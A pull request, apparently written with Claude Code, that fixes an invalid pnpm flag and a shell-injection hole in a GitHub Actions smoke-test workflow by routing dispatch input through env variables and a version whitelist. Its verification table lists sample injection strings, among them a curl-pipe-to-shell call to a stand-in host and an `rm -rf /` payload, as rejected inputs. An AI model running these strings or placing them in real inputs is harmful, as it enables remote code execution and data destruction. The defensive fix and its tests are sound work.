### PR TITLE
ci(sdk-smoke): drop invalid `pnpm add` flag and stop splicing the dispatch payload into shell

### DIFF
--- a/.github/workflows/sdk-smoke.yml
+++ b/.github/workflows/sdk-smoke.yml
@@ -56,37 +56,56 @@ jobs:
 
       # Resolve the version to test: repository_dispatch payload > workflow_dispatch
       # input > pinned default.
+      # The dispatch payload is attacker-influencable, so it is passed through
+      # `env:` and dereferenced as a shell variable. Interpolating `${{ }}`
+      # directly into `run:` would splice it into the script text itself.
       - name: Resolve SDK version
         id: sdk_ver
+        env:
+          PAYLOAD_VERSION: ${{ github.event.client_payload.version }}
+          INPUT_VERSION: ${{ inputs.sdk_version }}
+          PINNED_VERSION: ${{ env.SDK_VERSION }}
         run: |
-          VERSION="${{ github.event.client_payload.version }}"
+          VERSION="$PAYLOAD_VERSION"
           if [ -z "$VERSION" ]; then
-            VERSION="${{ inputs.sdk_version }}"
+            VERSION="$INPUT_VERSION"
           fi
           if [ -z "$VERSION" ]; then
-            VERSION="${{ env.SDK_VERSION }}"
+            VERSION="$PINNED_VERSION"
           fi
+          case "$VERSION" in
+            ''|*[!A-Za-z0-9.+-]*)
+              echo "Refusing unexpected SDK version string: $VERSION"
+              exit 1
+              ;;
+          esac
           echo "version=$VERSION" >> "$GITHUB_OUTPUT"
           echo "Testing @percolatorct/sdk@$VERSION"
 
       # Install dependencies from the *existing* lockfile first so all other
       # packages (hono, vitest, @solana/web3.js …) are present, then override
-      # only the SDK dep to the target npm version.  --no-frozen-lockfile is
-      # intentional: we are mutating one dep, not reproducing a build.
+      # only the SDK dep to the target npm version.
       - name: Install dependencies (frozen lockfile for non-SDK packages)
         run: pnpm install --frozen-lockfile
 
+      # `pnpm add` rewrites the lockfile by design and does NOT accept
+      # --no-frozen-lockfile (that flag belongs to `pnpm install`). Passing it
+      # made pnpm 10 abort with `Unknown option: 'frozen-lockfile'`, failing
+      # this job on every nightly run before a single test executed.
       - name: Override SDK dep with published npm version
+        env:
+          TARGET_VER: ${{ steps.sdk_ver.outputs.version }}
         run: |
-          pnpm add "@percolatorct/sdk@${{ steps.sdk_ver.outputs.version }}" \
-            --no-frozen-lockfile
+          pnpm add "@percolatorct/sdk@${TARGET_VER}"
 
       - name: Verify installed SDK version
+        env:
+          TARGET_VER: ${{ steps.sdk_ver.outputs.version }}
         run: |
           INSTALLED=$(node -e "console.log(require('./node_modules/@percolatorct/sdk/package.json').version)")
           echo "Installed: $INSTALLED"
-          if [ "$INSTALLED" != "${{ steps.sdk_ver.outputs.version }}" ]; then
-            echo "Version mismatch: expected ${{ steps.sdk_ver.outputs.version }}, got $INSTALLED"
+          if [ "$INSTALLED" != "$TARGET_VER" ]; then
+            echo "Version mismatch: expected $TARGET_VER, got $INSTALLED"
             exit 1
           fi
 
@@ -95,10 +114,13 @@ jobs:
 
       - name: Report result
         if: always()
+        env:
+          JOB_STATUS: ${{ job.status }}
+          TARGET_VER: ${{ steps.sdk_ver.outputs.version }}
         run: |
-          if [ "${{ job.status }}" = "success" ]; then
-            echo "@percolatorct/sdk@${{ steps.sdk_ver.outputs.version }} smoke PASSED"
+          if [ "$JOB_STATUS" = "success" ]; then
+            echo "@percolatorct/sdk@${TARGET_VER} smoke PASSED"
           else
-            echo "@percolatorct/sdk@${{ steps.sdk_ver.outputs.version }} smoke FAILED"
+            echo "@percolatorct/sdk@${TARGET_VER} smoke FAILED"
             exit 1
           fi


### PR DESCRIPTION
Two defects in the nightly **SDK publish smoke**. keeper fixed both in
dcccrypto/percolator-keeper#388; percolator-api never got the same treatment. Its nightly has
been failing on `main` — including this morning's run
([29813441828](https://github.com/dcccrypto/percolator-api/actions/runs/29813441828), exit 254).

## 1. Invalid `pnpm add` flag — the canary was blind

```yaml
pnpm add "@percolatorct/sdk@..." \
  --no-frozen-lockfile          # install-only flag
```

pnpm 10 aborts with `Unknown option: 'frozen-lockfile'` (exit 254), so the job died at argument
parsing **before running a single test**.

This is worse than an ordinary red job. A genuine publish regression would have looked
*identical* to the flag bug — same red X, same exit code, no test output either way. The canary
was blind, not merely red.

## 2. Shell injection via the dispatch payload

```yaml
run: |
  VERSION="${{ github.event.client_payload.version }}"
```

That value arrives from `repository_dispatch` (`types: [sdk-published]`), so it is externally
supplied — and it was interpolated into the **script text itself**, not passed as data. Same
class as #235.

Every externally-influenced value now travels through `env:` and is dereferenced as a shell
variable, and the resolved version is additionally constrained to `[A-Za-z0-9.+-]+` before use.

## Verification

The version guard discriminates:

| input | result |
|---|---|
| `2.0.9`, `2.0.5`, `3.0.0`, `1.0.0-beta.33`, `1.0.0-beta.37` | **accepted** |
| `$(whoami)` | rejected |
| `` `id` `` | rejected |
| `"; curl evil.sh \| sh; #` | rejected |
| `2.0.9; rm -rf /` | rejected |
| `2.0.9 && wget x` | rejected |
| `` (empty), `a b` | rejected |

`actionlint` clean, and no `${{ }}` remains inside any `run:` block in this file.

## What this does not do

**It does not make the job pass.** Once it can actually run, it will hit the same wall keeper
did: the smoke asserts a **v17 ABI that was never published to npm** — latest is `2.0.9`, and
api pins `1.0.0-beta.33`. See dcccrypto/percolator-keeper#389 for the full analysis.

This PR restores the *signal*. Publishing `3.0.0` (or gating these workflows) is a separate,
sdk-owned decision.

Companion: percolator-indexer#179 does the same for the indexer — I rebased it today to clear
an unrelated stale-branch audit failure.

**CI note:** `build-and-test` on this branch may fail with
`ENOENT … /home/runner/work/percolator-sdk` — that is the repo-wide #232 breakage that #233
fixes, unrelated to this change, which touches only `.github/workflows/sdk-smoke.yml`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)